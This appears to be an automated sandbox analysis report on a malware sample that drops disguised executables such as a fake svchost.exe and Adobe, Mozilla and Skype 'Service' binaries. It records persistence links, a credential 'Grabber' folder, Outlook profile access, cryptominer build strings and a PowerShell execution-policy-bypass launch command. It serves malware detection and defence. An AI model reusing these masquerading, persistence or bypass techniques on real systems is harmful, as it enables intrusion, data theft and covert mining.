                      Source: C:\Users\user\AppData\Local\Temp\5087.tmp.update.exeSection loaded: windows.storage.dll
                      Source: C:\Users\user\AppData\Local\Temp\5087.tmp.update.exeSection loaded: wldp.dll
                      Source: C:\Users\user\AppData\Local\Temp\5087.tmp.update.exeSection loaded: profapi.dll
                      Source: C:\Users\user\AppData\Local\Temp\5087.tmp.update.exeSection loaded: cryptsp.dll
                      Source: C:\Users\user\AppData\Local\Temp\5087.tmp.update.exeSection loaded: rsaenh.dll
                      Source: C:\Users\user\AppData\Local\Temp\5087.tmp.update.exeSection loaded: cryptbase.dll
                      Source: C:\Users\user\AppData\Local\Temp\5087.tmp.update.exeSection loaded: sspicli.dll
                      Source: C:\Users\user\AppData\Local\Temp\5087.tmp.update.exeSection loaded: msasn1.dll
                      Source: C:\Users\user\AppData\Local\Temp\5087.tmp.update.exeSection loaded: wbemcomn.dll
                      Source: C:\Users\user\AppData\Local\Temp\5087.tmp.update.exeSection loaded: amsi.dll
                      Source: C:\Users\user\AppData\Local\Temp\5087.tmp.update.exeSection loaded: userenv.dll
                      Source: C:\Windows\System32\timeout.exeSection loaded: version.dll
                      Source: C:\Users\user\AppData\Local\Temp\53A5.tmp.update.exeSection loaded: mscoree.dll
                      Source: C:\Users\user\AppData\Local\Temp\53A5.tmp.update.exeSection loaded: kernel.appcore.dll
                      Source: C:\Users\user\AppData\Local\Temp\53A5.tmp.update.exeSection loaded: version.dll
                      Source: C:\Users\user\AppData\Local\Temp\53A5.tmp.update.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Users\user\AppData\Local\Temp\53A5.tmp.update.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Local\Temp\53A5.tmp.update.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Local\Temp\53A5.tmp.update.exeSection loaded: windows.storage.dll
                      Source: C:\Users\user\AppData\Local\Temp\53A5.tmp.update.exeSection loaded: wldp.dll
                      Source: C:\Users\user\AppData\Local\Temp\53A5.tmp.update.exeSection loaded: profapi.dll
                      Source: C:\Users\user\AppData\Local\Temp\53A5.tmp.update.exeSection loaded: cryptsp.dll
                      Source: C:\Users\user\AppData\Local\Temp\53A5.tmp.update.exeSection loaded: rsaenh.dll
                      Source: C:\Users\user\AppData\Local\Temp\53A5.tmp.update.exeSection loaded: cryptbase.dll
                      Source: C:\Users\user\AppData\Local\Temp\53A5.tmp.update.exeSection loaded: sspicli.dll
                      Source: C:\Users\user\AppData\Local\Temp\53A5.tmp.update.exeSection loaded: msasn1.dll
                      Source: C:\Users\user\AppData\Local\Temp\5E16.tmp.aaa.exeSection loaded: mscoree.dll
                      Source: C:\Users\user\AppData\Local\Temp\5E16.tmp.aaa.exeSection loaded: apphelp.dll
                      Source: C:\Users\user\AppData\Local\Temp\5E16.tmp.aaa.exeSection loaded: kernel.appcore.dll
                      Source: C:\Users\user\AppData\Local\Temp\5E16.tmp.aaa.exeSection loaded: version.dll
                      Source: C:\Users\user\AppData\Local\Temp\5E16.tmp.aaa.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Users\user\AppData\Local\Temp\5E16.tmp.aaa.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Local\Temp\5E16.tmp.aaa.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Local\Temp\5E16.tmp.aaa.exeSection loaded: windows.storage.dll
                      Source: C:\Users\user\AppData\Local\Temp\5E16.tmp.aaa.exeSection loaded: wldp.dll
                      Source: C:\Users\user\AppData\Local\Temp\5E16.tmp.aaa.exeSection loaded: profapi.dll
                      Source: C:\Users\user\AppData\Local\Temp\5E16.tmp.aaa.exeSection loaded: cryptsp.dll
                      Source: C:\Users\user\AppData\Local\Temp\5E16.tmp.aaa.exeSection loaded: rsaenh.dll
                      Source: C:\Users\user\AppData\Local\Temp\5E16.tmp.aaa.exeSection loaded: cryptbase.dll
                      Source: C:\Users\user\AppData\Local\Temp\5E16.tmp.aaa.exeSection loaded: sspicli.dll
                      Source: C:\Users\user\AppData\Local\Temp\5E16.tmp.aaa.exeSection loaded: msasn1.dll
                      Source: C:\Users\user\AppData\Local\Temp\5E16.tmp.aaa.exeSection loaded: mswsock.dll
                      Source: C:\Users\user\AppData\Local\Temp\5E16.tmp.aaa.exeSection loaded: secur32.dll
                      Source: C:\Users\user\AppData\Local\Temp\5E16.tmp.aaa.exeSection loaded: schannel.dll
                      Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exeSection loaded: mscoree.dll
                      Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exeSection loaded: apphelp.dll
                      Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exeSection loaded: kernel.appcore.dll
                      Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exeSection loaded: version.dll
                      Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exeSection loaded: uxtheme.dll
                      Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exeSection loaded: windows.storage.dll
                      Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exeSection loaded: wldp.dll
                      Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exeSection loaded: profapi.dll
                      Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exeSection loaded: cryptsp.dll
                      Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exeSection loaded: rsaenh.dll
                      Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exeSection loaded: cryptbase.dll
                      Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exeSection loaded: dwrite.dll
                      Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exeSection loaded: msvcp140_clr0400.dll
                      Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exeSection loaded: mswsock.dll
                      Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exeSection loaded: sspicli.dll
                      Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exeSection loaded: secur32.dll
                      Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exeSection loaded: wbemcomn.dll
                      Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exeSection loaded: amsi.dll
                      Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exeSection loaded: userenv.dll
                      Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exeSection loaded: dpapi.dll
                      Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exeSection loaded: rstrtmgr.dll
                      Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exeSection loaded: ncrypt.dll
                      Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exeSection loaded: ntasn1.dll
                      Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exeSection loaded: windowscodecs.dll
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dll
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dll
                      Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dll
                      Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: mscoree.dll
                      Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: kernel.appcore.dll
                      Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: version.dll
                      Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: windows.storage.dll
                      Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: wldp.dll
                      Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: profapi.dll
                      Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: cryptsp.dll
                      Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: rsaenh.dll
                      Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: cryptbase.dll
                      Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: sspicli.dll
                      Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: msasn1.dll
                      Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: wbemcomn.dll
                      Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: amsi.dll
                      Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: userenv.dll
                      Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: mswsock.dll
                      Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: secur32.dll
                      Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: schannel.dll
                      Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: mskeyprotect.dll
                      Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: ntasn1.dll
                      Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: ncrypt.dll
                      Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: ncryptsslp.dll
                      Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: gpapi.dll
                      Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: uxtheme.dll
                      Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: propsys.dll
                      Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: edputil.dll
                      Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: urlmon.dll
                      Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: iertutil.dll
                      Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: srvcli.dll
                      Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: netutils.dll
                      Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: windows.staterepositoryps.dll
                      Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: wintypes.dll
                      Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: appresolver.dll
                      Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: bcp47langs.dll
                      Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: slc.dll
                      Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: sppc.dll
                      Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: onecorecommonproxystub.dll
                      Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: onecoreuapcommonproxystub.dll
                      Source: C:\Users\user\Desktop\xj40xovMsm.exeSection loaded: wininet.dll
                      Source: C:\Users\user\Desktop\xj40xovMsm.exeSection loaded: iertutil.dll
                      Source: C:\Users\user\Desktop\xj40xovMsm.exeSection loaded: sspicli.dll
                      Source: C:\Users\user\Desktop\xj40xovMsm.exeSection loaded: windows.storage.dll
                      Source: C:\Users\user\Desktop\xj40xovMsm.exeSection loaded: wldp.dll
                      Source: C:\Users\user\Desktop\xj40xovMsm.exeSection loaded: profapi.dll
                      Source: C:\Users\user\Desktop\xj40xovMsm.exeSection loaded: kernel.appcore.dll
                      Source: C:\Users\user\Desktop\xj40xovMsm.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\Users\user\Desktop\xj40xovMsm.exeSection loaded: winhttp.dll
                      Source: C:\Users\user\Desktop\xj40xovMsm.exeSection loaded: iphlpapi.dll
                      Source: C:\Users\user\Desktop\xj40xovMsm.exeSection loaded: mswsock.dll
                      Source: C:\Users\user\Desktop\xj40xovMsm.exeSection loaded: winnsi.dll
                      Source: C:\Users\user\Desktop\xj40xovMsm.exeSection loaded: dpapi.dll
                      Source: C:\Users\user\Desktop\xj40xovMsm.exeSection loaded: msasn1.dll
                      Source: C:\Users\user\Desktop\xj40xovMsm.exeSection loaded: cryptsp.dll
                      Source: C:\Users\user\Desktop\xj40xovMsm.exeSection loaded: rsaenh.dll
                      Source: C:\Users\user\Desktop\xj40xovMsm.exeSection loaded: cryptbase.dll
                      Source: C:\Users\user\Desktop\xj40xovMsm.exeSection loaded: gpapi.dll
                      Source: C:\Users\user\Desktop\xj40xovMsm.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
                      Source: Service_Adobe.exe.lnk.0.drLNK file: ..\..\..\..\..\Adobe\Service_Adobe.exe
                      Source: Service_com.adobe.dunamis.exe.lnk.0.drLNK file: ..\..\..\..\..\com.adobe.dunamis\Service_com.adobe.dunamis.exe
                      Source: Service_Microsoft.exe.lnk.0.drLNK file: ..\..\..\..\Service_Microsoft.exe
                      Source: Service_Mozilla.exe.lnk.0.drLNK file: ..\..\..\..\..\Mozilla\Service_Mozilla.exe
                      Source: Service_Skype.exe.lnk.0.drLNK file: ..\..\..\..\..\Skype\Service_Skype.exe
                      Source: psvhost.exe.lnk.0.drLNK file: ..\..\..\..\..\..\Local\Microsoft\psvhost.exe
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeFile written: C:\Users\user\AppData\Local\3f9e073e7640535ca31a09fed4e39f55\user@134349_en-CH\Grabber\DRIVE-C\Users\user\Desktop\desktop.ini
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Users\user\AppData\Roaming\svchost.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                      Source: xj40xovMsm.exeStatic PE information: Image base 0x140000000 > 0x60000000
                      Source: xj40xovMsm.exeStatic file information: File size 15088640 > 1048576
                      Source: xj40xovMsm.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                      Source: Binary string: ntkrnlmp.pdb3x, source: 62AB.tmp.build.exe, 00000014.00000002.2313201654.00000000012B8000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: winload_prod.pdb source: Temp.txt.6.dr, Temp.txt.9.dr
                      Source: Binary string: costura.dotnetzip.pdb.compressed source: explorer.exe, 00000002.00000003.1848102224.000000000AB61000.00000004.00000001.00020000.00000000.sdmp, 3CBD.tmp.Installer.exe, 00000005.00000000.1848901548.0000000000EE2000.00000002.00000001.01000000.0000000C.sdmp, accc.exe, 00000020.00000002.2548612553.0000000002819000.00000004.00000800.00020000.00000000.sdmp, accc.exe, 00000020.00000002.2548612553.0000000002823000.00000004.00000800.00020000.00000000.sdmp, 3CBD.tmp.Installer.exe.2.dr, accc.exe.5.dr
                      Source: Binary string: ntkrnlmp.pdb source: Temp.txt.6.dr, Temp.txt.9.dr
                      Source: Binary string: winload_prod.pdb\ source: Temp.txt.6.dr, Temp.txt.9.dr
                      Source: Binary string: C:\Users\Netboy FX\Desktop\BitcoinMiner\BitcoinMiner\obj\Release\BitcoinMiner.pdbr source: xj40xovMsm.exe
                      Source: Binary string: ntkrnlmp.pdb\ source: Temp.txt.6.dr, Temp.txt.9.dr
                      Source: Binary string: C:\Users\Netboy FX\Desktop\BitcoinMiner\BitcoinMiner\obj\Release\BitcoinMiner.pdb source: xj40xovMsm.exe
                      Source: Binary string: costura.dotnetzip.pdb.compressed|||DotNetZip.pdb|565BABCBCD978AF66FE1150CC58FDEAFC9815822|622080 source: explorer.exe, 00000002.00000003.1848102224.000000000AB61000.00000004.00000001.00020000.00000000.sdmp, 3CBD.tmp.Installer.exe, 00000005.00000000.1848901548.0000000000EE2000.00000002.00000001.01000000.0000000C.sdmp, 3CBD.tmp.Installer.exe.2.dr, accc.exe.5.dr
                      Source: Binary string: costura.dotnetzip.pdb.compressed`E source: accc.exe, 00000020.00000002.2548612553.0000000002823000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: WINLOA~1.PDBwinload_prod.pdbtmpDx source: 62AB.tmp.build.exe, 00000014.00000002.2313201654.00000000012B8000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: p.pdb.compressed source: accc.exe, 00000020.00000002.2548612553.0000000002823000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: costura.dotnetzip.pdb.compressed8 source: 3CBD.tmp.Installer.exe, 00000005.00000002.1941590624.00000000032C1000.00000004.00000800.00020000.00000000.sdmp, accc.exe, 0000000B.00000002.3143963860.0000000002A11000.00000004.00000800.00020000.00000000.sdmp, accc.exe, 00000020.00000002.2548612553.0000000002823000.00000004.00000800.00020000.00000000.sdmp
                      Source: xj40xovMsm.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                      Source: xj40xovMsm.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                      Source: xj40xovMsm.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                      Source: xj40xovMsm.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                      Source: xj40xovMsm.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

                      Data Obfuscation

                      barindex
                      Source: 3CBD.tmp.Installer.exe.2.dr, yfwLUpaytDvy.cs.Net Code: ivaYcmPJXHtcv System.Reflection.Assembly.Load(byte[])
                      Source: accc.exe.5.dr, yfwLUpaytDvy.cs.Net Code: ivaYcmPJXHtcv System.Reflection.Assembly.Load(byte[])
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\jqnnpe.exe"'
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\jqnnpe.exe"'
                      Source: Yara matchFile source: 24.2.svchost.exe.6a20000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000018.00000002.3207543510.0000000006A20000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000018.00000002.3152328073.000000000283E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 7952, type: MEMORYSTR
                      Source: 3CBD.tmp.Installer.exe.2.drStatic PE information: 0xB3ABDDB8 [Thu Jul 9 17:11:20 2065 UTC]
                      Source: C:\Users\user\Desktop\xj40xovMsm.exeCode function: 0_2_00007FF68A18384C LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetModuleFileNameW,ExpandEnvironmentStringsW,CreateFileW,CloseHandle,VirtualFree,0_2_00007FF68A18384C
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeCode function: 6_2_05110538 push eax; ret 6_2_05110545
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeCode function: 6_2_0511EC58 push esp; iretd 6_2_0511EC59
                      Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exeCode function: 9_2_057AEC58 push esp; iretd 9_2_057AEC59
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeCode function: 10_2_011380F9 push es; retf 10_2_01138106
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeCode function: 10_2_0113B2A8 pushad ; iretd 10_2_0113B2A9
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeCode function: 10_2_01139713 push edi; retf 10_2_01139752
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeCode function: 10_2_01139608 push ebx; retf 10_2_01139612
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeCode function: 10_2_01139623 push ebx; retf 10_2_01139642
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeCode function: 10_2_01139643 push ebp; retf 10_2_011396B2
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeCode function: 10_2_01139643 push ebp; retf 10_2_011396C2
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeCode function: 10_2_01139643 push edi; retf 10_2_01139752
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeCode function: 10_2_011396B3 push ebp; retf 10_2_011396C2
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeCode function: 10_2_011396B3 push edi; retf 10_2_01139752
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeCode function: 10_2_011396A8 push ebp; retf 10_2_011396B2
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeCode function: 10_2_011396D3 push edi; retf 10_2_01139752
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeCode function: 10_2_011396C3 push edi; retf 10_2_01139752
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeCode function: 10_2_01139F2F push ebp; retf 10_2_01139F3E
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeCode function: 10_2_0555E900 push E406ACAAh; iretd 10_2_0555E905
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeCode function: 10_2_05551F28 push edi; retf 10_2_05551F36
                      Source: C:\Users\user\AppData\Local\Temp\5E16.tmp.aaa.exeCode function: 19_2_00007FFD9B5F00BD pushad ; iretd 19_2_00007FFD9B5F00C1
                      Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 24_2_06B36EF4 push E806A797h; retf 24_2_06B36EF9
                      Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 24_2_06B33CC0 push es; ret 24_2_06B33CD0
                      Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 24_2_06B37C03 push eax; ret 24_2_06B37C04
                      Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 24_2_06B37BCB push eax; ret 24_2_06B37BCC
                      Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 24_2_06B350DF push es; ret 24_2_06B350E0
                      Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 24_2_06D180F2 push es; ret 24_2_06D180FC
                      Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 24_2_06D52690 push es; ret 24_2_06D526A0
                      Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 24_2_06D53E8D push es; iretd 24_2_06D53EAC
                      Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 24_2_06D53EB1 push es; retf D539h24_2_06D53EF4
                      Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 24_2_06D5EB8A push eax; ret 24_2_06D5EB91
                      Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 24_2_06D5A83E push es; ret 24_2_06D5A868
                      Source: 3CBD.tmp.Installer.exe.2.drStatic PE information: section name: .text entropy: 7.52310872889488
                      Source: accc.exe.5.drStatic PE information: section name: .text entropy: 7.52310872889488
                      Source: 53A5.tmp.update.exe.2.dr, zyThENgDGfg.csHigh entropy of concatenated method names: 'ENAEgdtUvXRDlvvo', 'ekngeYZXgecDFZ', 'EFuhkyNeLZeeI', 'RXSkXtWyfRyes', 'dLkgnLSXQRJ', 'lefKjZrZkeU', 'tXJUZGRmXTibZ', 'YafXnCLQVVTG', 'eibHGLdPvEWJEjJ', 'ANMLfUhVqLU'
                      Source: 5087.tmp.update.exe.2.dr, zyThENgDGfg.csHigh entropy of concatenated method names: 'ENAEgdtUvXRDlvvo', 'ekngeYZXgecDFZ', 'EFuhkyNeLZeeI', 'RXSkXtWyfRyes', 'dLkgnLSXQRJ', 'lefKjZrZkeU', 'tXJUZGRmXTibZ', 'YafXnCLQVVTG', 'eibHGLdPvEWJEjJ', 'ANMLfUhVqLU'

                      Persistence and Installation Behavior

                      barindex
                      Source: C:\Users\user\AppData\Local\Temp\5087.tmp.update.exeFile created: C:\Users\user\AppData\Roaming\svchost.exeJump to dropped file
                      Source: C:\Users\user\Desktop\xj40xovMsm.exeFile written: C:\Users\user\AppData\Roaming\Adobe\Service_Adobe.exeJump to behavior
                      Source: C:\Users\user\Desktop\xj40xovMsm.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Service_Mozilla.exeJump to behavior
                      Source: C:\Users\user\Desktop\xj40xovMsm.exeFile created: C:\Users\user\AppData\Roaming\com.adobe.dunamis\Service_com.adobe.dunamis.exeJump to dropped file
                      Source: C:\Users\user\Desktop\xj40xovMsm.exeFile created: C:\Users\user\AppData\Roaming\{B955B2CC07A01546086603}\Service_{B955B2CC07A01546086603}.exeJump to dropped file
                      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\5E16.tmp.aaa.exeJump to dropped file
                      Source: C:\Users\user\Desktop\xj40xovMsm.exeFile created: C:\Users\user\AppData\Roaming\Mozilla\Service_Mozilla.exeJump to dropped file
                      Source: C:\Users\user\Desktop\xj40xovMsm.exeFile created: C:\Users\user\AppData\Roaming\{B955B2CC07A01546086603}\{B955B2CC07A01546086603}.exeJump to dropped file
                      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\3CBD.tmp.Installer.exeJump to dropped file
                      Source: C:\Users\user\Desktop\xj40xovMsm.exeFile created: C:\Users\user\AppData\Roaming\Adobe\Service_Adobe.exeJump to dropped file
                      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\5087.tmp.update.exeJump to dropped file
                      Source: C:\Users\user\Desktop\xj40xovMsm.exeFile created: C:\Users\user\AppData\Local\Temp\SystemUpdate.exeJump to dropped file
                      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exeJump to dropped file
                      Source: C:\Users\user\Desktop\xj40xovMsm.exeFile created: C:\Users\user\AppData\Local\Microsoft\psvhost.exeJump to dropped file
                      Source: C:\Windows\System32\relog.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\update[1].packJump to dropped file
                      Source: C:\Users\user\Desktop\xj40xovMsm.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\zbi[1].exeJump to dropped file
                      Source: C:\Windows\System32\relog.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\update2[1].packJump to dropped file
                      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\53A5.tmp.update.exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\3CBD.tmp.Installer.exeFile created: C:\ProgramData\KMSAuto\accc.exeJump to dropped file
                      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeJump to dropped file
                      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeJump to dropped file
                      Source: C:\Users\user\Desktop\xj40xovMsm.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\zbi[1].exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\5087.tmp.update.exeFile created: C:\Users\user\AppData\Roaming\svchost.exeJump to dropped file
                      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exeJump to dropped file
                      Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\jqnnpe.exeJump to dropped file
                      Source: C:\Users\user\Desktop\xj40xovMsm.exeFile created: C:\Users\user\AppData\Roaming\Skype\Service_Skype.exeJump to dropped file
                      Source: C:\Users\user\Desktop\xj40xovMsm.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Service_Microsoft.exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\3CBD.tmp.Installer.exeFile created: C:\ProgramData\KMSAuto\accc.exeJump to dropped file
                      Source: C:\Windows\System32\relog.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\update[1].packJump to dropped file
                      Source: C:\Windows\System32\relog.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\update2[1].packJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\3CBD.tmp.Installer.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\3CBD.tmp.Installer.exe.logJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeFile created: C:\ProgramData\134349\InstalledSoftware.txt
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeFile created: C:\Users\user\AppData\Roaming\134349\InstalledSoftware.txt

                      Boot Survival

                      barindex
                      Source: Yara matchFile source: 14.0.5087.tmp.update.exe.6f0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.0.4336.tmp.Server.exe.190000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.5087.tmp.update.exe.2aa51fc.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.5087.tmp.update.exe.2aa51fc.0.raw.unpack, type: UNPACKEDPE
